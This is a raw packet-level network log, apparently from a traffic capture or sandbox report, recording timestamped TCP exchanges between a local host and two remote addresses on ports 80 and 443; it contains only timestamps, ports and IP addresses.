Dec 18, 2024 13:38:38.627049923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.627079964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.627093077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.628060102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.628073931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.628114939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.629370928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.629384041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.629424095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.630486965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.630501032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.630522013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.630539894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.630570889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.631800890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.631815910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.631844044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.631856918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.632639885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.632652998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.632684946 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.632698059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.633564949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.633579016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.633608103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.633620024 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.634469032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.634484053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.634494066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.634519100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.634540081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.635807037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.635821104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.635849953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.635864019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.637039900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.637085915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.637094975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.637139082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.641696930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.641745090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.642720938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.642738104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.642770052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.642786980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.644320965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.644375086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.644382000 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.644387960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.644401073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.644418955 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.644440889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.653810024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.653867960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.654407024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.654422045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.654464960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.654479027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.655595064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.655612946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.655647993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.655663013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.656179905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.656196117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.656229973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.656243086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.657314062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.657331944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.657360077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.657381058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.658510923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.658531904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.658556938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.658572912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.659389973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.659409046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.659455061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.660702944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.660747051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.741492033 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.741547108 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.741630077 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.741965055 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.741976976 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.785157919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.785255909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.785315990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.785381079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.785494089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.785546064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.785917997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.785967112 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.786396980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.786443949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.787128925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.787177086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.787590027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.787647009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.787934065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.787997961 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.788141966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.788189888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.788649082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.788697958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.789062023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.789074898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.789112091 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.790029049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.790075064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.790524960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.790571928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.791047096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.791059971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.791105986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.792030096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.792071104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.792517900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.792562962 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.793075085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.793119907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.793546915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.793587923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.794029951 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.794043064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.794075012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.794087887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.794979095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.794991016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.795027971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.796010017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.796057940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.796976089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.797022104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.797532082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.797544003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.797580004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.797593117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.798871040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.798883915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.798923969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.798942089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.799578905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.799591064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.799627066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.799642086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.800698042 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.800710917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.800759077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.801536083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.801551104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.801583052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.801608086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.802587032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.802601099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.802628994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.802642107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.803555012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.803566933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.803595066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.803607941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.804491997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.804505110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.804529905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.804542065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.805511951 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.805524111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.805556059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.805568933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.806453943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.806468010 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.806500912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.806514025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.807465076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.807476997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.807504892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.807518005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.808469057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.808480978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.808521986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.808535099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.809469938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.809483051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.809519053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.809534073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.810511112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.810523033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.810555935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.810569048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.811456919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.811469078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.811511040 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.812710047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.812758923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.812764883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.812810898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.813889980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.813903093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.813934088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.813946962 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.814929008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.814940929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.814968109 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.814980030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.816243887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.816257000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.816268921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.816284895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.816301107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.817303896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.817320108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.817349911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.817368031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.818558931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.818572044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.818608046 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.818633080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.819689035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.819700956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.819736004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.819747925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.820513964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.820530891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.820544958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.820569038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.820580959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.821579933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.821598053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.821657896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.822468996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.822487116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.822521925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.822556973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.823604107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.823621988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.823652983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.823667049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.824645996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.824690104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.824696064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.824738026 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.825731993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.825747967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.825757980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.825788975 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.825803041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.826842070 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.826867104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.826881886 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.826898098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.827972889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.827991009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.828016043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.828027010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.829004049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.829032898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.829052925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.829065084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.830147982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.830164909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.830178022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.830205917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.830228090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.831188917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.831237078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.845494986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.845551014 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.845735073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.845781088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.846332073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.846375942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.846827030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.846870899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.847323895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.847340107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.847364902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.847377062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.848747969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.848764896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.848793030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.848819017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.849772930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.849790096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.849816084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.849829912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.850898981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.850918055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.850950956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.850963116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.851910114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.851931095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.851963997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.851963997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.977190971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.977336884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.977349043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.977405071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.977868080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.978360891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.978471041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.978879929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.978935003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.979370117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.979564905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.979912996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.979926109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.979975939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.980890989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.980942011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.981414080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.981467009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.981863022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.981874943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.981920958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.983369112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.983382940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.983431101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.984386921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.984400988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.984453917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.985397100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.985409975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.985457897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.986685038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.986697912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.986747980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.987616062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.987629890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.987687111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.988605976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.988620043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.988667965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.989357948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.989371061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.989427090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.990350008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.990361929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.990422010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.991384029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.991445065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.991813898 CET	80	49715	31.41.244.11	192.168.2.8
